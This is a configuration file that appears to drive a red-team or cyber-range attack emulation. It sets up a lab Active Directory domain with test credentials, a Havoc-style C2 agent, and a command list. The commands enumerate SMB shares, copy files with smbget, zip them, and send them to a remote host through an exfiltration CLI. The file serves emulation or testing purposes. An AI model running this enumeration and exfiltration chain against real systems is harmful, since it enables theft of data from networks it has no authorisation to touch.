[exfil_task]
exfil_type = http-get
exfil_port = 80
exfil_outfile = exfil_file.zip
domain_name = None

[remote_ad_task]
task_name = remote_trainman_ad
ad_tld = local
ad_domain = samdom
ad_realm = SAMDOM.LOCAL
user_name = jdisco
user_password = user_password_152637
admin_password = samdom_password_152637

[remote_c2_agent_task]
task_name = remote_trainman_agent

[c2_task]
task_name = c2_http_MM_dd_YYYY_HH_mm
agent_name = 1w2x3y4z
command_list = smbclient '//$TARGET/$USER_NAME' -c 'recurse;ls' -U $USER_NAME%%$USER_PASSWORD, smbclient '//$TARGET/users' -c 'recurse;ls' -U $USER_NAME%%$USER_PASSWORD, smbget smb://$TARGET/$USER_NAME/sample-data.csv -o /opt/havoc/shared/sample-data.csv -U $USER_NAME%%$USER_PASSWORD, smbget smb://$TARGET/$USER_NAME/test-5mb.bin -o /opt/havoc/shared/test-5mb.bin -U $USER_NAME%%$USER_PASSWORD, smbget smb://$TARGET/users/test-10mb.bin -o /opt/havoc/shared/test-10mb.bin -U $USER_NAME%%$USER_PASSWORD, smbget smb://$TARGET/users/test-20mb.bin -o /opt/havoc/shared/test-20mb.bin -U $USER_NAME%%$USER_PASSWORD, zip /opt/havoc/shared/exfil_file.zip /opt/havoc/shared/*.csv /opt/havoc/shared/*.bin, /exfilkit/exfilkit-cli.py -m $EXFIL_METHOD -rh $EXFIL_HOST -rp $EXFIL_PORT -i /opt/havoc/shared/exfil_file.zip -r
